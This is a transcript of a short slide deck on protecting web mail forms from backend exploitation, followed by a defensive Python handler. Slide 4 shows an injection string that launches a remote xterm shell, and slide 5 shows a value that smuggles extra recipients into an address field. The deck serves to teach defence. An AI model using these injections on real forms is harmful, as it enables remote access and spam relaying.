Avoiding Backend Exploitation of Mail Forms - PowerPoint PPT Presentation

Slides: 7
Provided by: rd1
Transcript and Presenter's Notes


1
Avoiding Backend Exploitation of Mail Forms
  • Max Kessler, LPIC-1

2
OWASP Top 10 List
  • 1 Unvalidated user input
  • 2 Broken access control (sort of)
  • 6 Injection flaws

3
How do mail forms work?
  • A user types in their name, address and a
    message.
  • Their data are sent to the web server in an HTTP
    request.
  • The server runs a script that formats the text
    for consumption by a mail server, then feeds it
    to the mail server.

4
User input on the command line
  • Exploit 1: insert semicolon/ampersand
  • The command should be:
  • /bin/sh /usr/sbin/sendmail -f max_at_example.com \
    user1_at_example.com
  • The command is:
  • /bin/sh /usr/sbin/sendmail -f max_at_example.com \
    xterm -display 192.168.0.2010echo \
    user1_at_example.com

5
Replay with control characters
  • Exploit 2: insert control characters
  • E-mail address should be:
  • max_at_example.com
  • E-mail address is:
  • max_at_example.com
  • To: user2_at_example.com, user3_at_example.com

6
Starting a new message
  • Exploit 3: using '.' to start a new message
  • SMTP servers allow multiple messages to be sent
    through a single connection. A new message is
    started by putting a '.' on a line by itself.
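
Added example (not part of the original slides): one way a form handler can close off all three exploits, by validating addresses, rejecting control characters, and handing sendmail an argument list instead of a shell string. The address pattern, function names, subject line and sample values are assumptions made for this sketch; only the /usr/sbin/sendmail path comes from the slides.

```python
import re
from email.headerregistry import Address
from email.message import EmailMessage

# Deliberately narrow address pattern (an assumption of this example, stricter than RFC 5322).
ADDR_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")
CTRL_RE = re.compile(r"[\x00-\x1f\x7f]")

def check_address(value):
    """Return value if it is exactly one plain address, else raise ValueError."""
    # fullmatch() also rejects a trailing newline, which match() with '$' would accept.
    if not ADDR_RE.fullmatch(value):
        raise ValueError(f"rejected address: {value!r}")
    return value

def build_mail(sender, recipient, name, text):
    """Return (argv, message_bytes) for a sendmail-compatible binary."""
    sender, recipient = check_address(sender), check_address(recipient)
    if CTRL_RE.search(name):
        raise ValueError("control character in name")
    msg = EmailMessage()
    msg["From"] = Address(display_name=name, addr_spec=sender)
    msg["To"] = recipient
    msg["Subject"] = "Mail form message"
    msg.set_content(text)
    # argv is a list, so no shell ever parses ';' or '&' (exploit 1).
    # -i: a lone '.' does not end the message (exploit 3); '--' ends option parsing.
    argv = ["/usr/sbin/sendmail", "-i", "-f", sender, "--", recipient]
    return argv, msg.as_bytes()

def dot_stuff(body):
    """For scripts that write SMTP DATA themselves: escape leading dots (RFC 5321, 4.5.2)."""
    lines = body.replace("\r\n", "\n").split("\n")
    return "\r\n".join("." + line if line.startswith(".") else line for line in lines)

if __name__ == "__main__":
    # Constructed sample input; send with subprocess.run(argv, input=data, check=True).
    argv, data = build_mail("max@example.com", "user1@example.com", "Max", "hi\n.\nbye")
    print(argv)
    print(data.decode())
```
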